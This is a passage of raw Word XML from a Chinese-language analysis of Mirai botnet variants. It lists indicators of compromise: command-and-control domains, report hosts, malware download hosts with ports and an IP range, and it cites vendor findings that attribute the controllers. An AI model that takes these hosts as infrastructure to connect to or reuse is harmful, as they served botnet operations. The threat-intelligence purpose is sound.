    <w:p w:rsidR="003C6ECE" w:rsidRDefault="003C6ECE" w:rsidP="00F63C30">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00697F42">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>check.securityupdates.us</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C6ECE" w:rsidRPr="00697F42" w:rsidRDefault="003C6ECE" w:rsidP="00F63C30">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00697F42">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>linux.securityupdates.us</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C6ECE" w:rsidRDefault="003C6ECE" w:rsidP="00F63C30">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00697F42">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>xxx.securityupdates.us</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E7DFB" w:rsidRPr="00697F42" w:rsidRDefault="007E7DFB" w:rsidP="00F63C30">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>timeserver.host</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63C30" w:rsidRPr="00F63C30" w:rsidRDefault="00F63C30" w:rsidP="00F63C30">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F63C30">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>zugzwang.me</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63C30" w:rsidRPr="00F63C30" w:rsidRDefault="00F63C30" w:rsidP="00F63C30">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F63C30">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>tr069.online</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63C30" w:rsidRPr="00F63C30" w:rsidRDefault="00F63C30" w:rsidP="00F63C30">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F63C30">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>tr069.tech</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F63C30" w:rsidRDefault="00F63C30" w:rsidP="00F63C30">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F63C30">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>tr069.support</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C4469A" w:rsidRDefault="00C4469A" w:rsidP="00F63C30">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ab"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cnc.changeme.com:23</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B65F2" w:rsidRPr="00F63C30" w:rsidRDefault="004B65F2" w:rsidP="004B65F2">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B65F2">
        <w:rPr>
          <w:rStyle w:val="ab"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5.188.232.1/24</w:t>
      </w:r>
      <w:bookmarkStart w:id="6" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w:rsidR="00F63C30" w:rsidRDefault="00F63C30" w:rsidP="003C6ECE">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="422"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CF21F5" w:rsidRDefault="00CF21F5" w:rsidP="003C6ECE">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF21F5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>扫描报告</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF21F5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF21F5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ScanListen</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF21F5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF21F5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>主机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF21F5" w:rsidRPr="00697F42" w:rsidRDefault="00CF21F5" w:rsidP="00CF21F5">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00697F42">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>report.santasbigcandycane.cx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF21F5" w:rsidRPr="00697F42" w:rsidRDefault="00CF21F5" w:rsidP="00CF21F5">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00697F42">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>rep.securityupdates.us</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF21F5" w:rsidRDefault="00CF21F5" w:rsidP="00CF21F5">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>report.changeme.com:48101</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008539AC" w:rsidRDefault="008539AC" w:rsidP="008539AC">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00697F42">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>ntp.timeserver.host</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF21F5" w:rsidRPr="00CF21F5" w:rsidRDefault="00CF21F5" w:rsidP="003C6ECE">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CF21F5" w:rsidRPr="00697F42" w:rsidRDefault="00CF21F5" w:rsidP="003C6ECE">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="422"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001C5E0F" w:rsidRPr="001C5E0F" w:rsidRDefault="001C5E0F" w:rsidP="003C6ECE">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C5E0F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>程序下载主机包括：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C5E0F" w:rsidRPr="00697F42" w:rsidRDefault="001C5E0F" w:rsidP="00F63C30">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00697F42">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>p.ocalhost.host</w:t>
      </w:r>
      <w:r w:rsidR="00394F8B">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>:80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C5E0F" w:rsidRDefault="001C5E0F" w:rsidP="00F63C30">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00697F42">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>l.ocalhost.host</w:t>
      </w:r>
      <w:r w:rsidR="00394F8B">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>:80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35AF1" w:rsidRPr="00697F42" w:rsidRDefault="00D35AF1" w:rsidP="00F63C30">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>tr069</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ab"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D35AF1">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>pw</w:t>
      </w:r>
      <w:r w:rsidR="00394F8B">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>:80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C5E0F" w:rsidRDefault="00D35AF1" w:rsidP="00F63C30">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>5.8.65.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D35AF1">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00394F8B">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>:80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00450BA2" w:rsidRPr="00697F42" w:rsidRDefault="00450BA2" w:rsidP="00F63C30">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00697F42">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>check.kernelorg.download</w:t>
      </w:r>
      <w:r w:rsidR="00394F8B">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>:80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00450BA2" w:rsidRDefault="00450BA2" w:rsidP="00F63C30">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00697F42">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>update.kernelorg.download</w:t>
      </w:r>
      <w:r w:rsidR="00394F8B">
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
        <w:t>:80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00450BA2" w:rsidRPr="00450BA2" w:rsidRDefault="00450BA2" w:rsidP="00450BA2">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rStyle w:val="ab"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003C6ECE" w:rsidRDefault="003C6ECE" w:rsidP="003C6ECE">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED6F99">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>360分析了一天内各个时段控制指令数量分布，认为控制者位于欧洲和美洲，以欧洲为甚，应不位于北京时区</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:id w:val="-1935579255"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidRPr="00ED6F99">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00ED6F99">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00ED6F99">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText>CITATION 36016 \l 2052</w:instrText>
          </w:r>
          <w:r w:rsidRPr="00ED6F99">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00ED6F99">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00B65ABC">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:noProof/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00B65ABC" w:rsidRPr="00B65ABC">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:noProof/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t>[10]</w:t>
          </w:r>
          <w:r w:rsidRPr="00ED6F99">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidRPr="00ED6F99">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。绿盟给出了一个位于俄罗斯的IP地址</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED6F99">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>37.139.59.69</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:id w:val="-101658106"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidRPr="00ED6F99">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00ED6F99">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00ED6F99">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText>CITATION 绿盟科16 \l 2052</w:instrText>
          </w:r>
          <w:r w:rsidRPr="00ED6F99">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00ED6F99">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00B65ABC">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:noProof/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00B65ABC" w:rsidRPr="00B65ABC">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:noProof/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t>[11]</w:t>
          </w:r>
          <w:r w:rsidRPr="00ED6F99">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidRPr="00ED6F99">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00583BC0" w:rsidRDefault="00583BC0" w:rsidP="00583BC0"/>
    <w:p w:rsidR="003714FD" w:rsidRPr="003714FD" w:rsidRDefault="00DA0103" w:rsidP="00F63C30">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003714FD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2016年12月9日左右，360网络安全研究院报告了带DGA特征的Mirai</w:t>
      </w:r>
      <w:r w:rsidR="00EC03BC">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>样本</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:id w:val="-1092553071"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="003714FD" w:rsidRPr="003714FD">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="003714FD" w:rsidRPr="003714FD">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidR="003714FD" w:rsidRPr="003714FD">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText>CITATION 360162 \l 2052</w:instrText>
          </w:r>
          <w:r w:rsidR="003714FD" w:rsidRPr="003714FD">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidR="003714FD" w:rsidRPr="003714FD">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00B65ABC">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:noProof/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
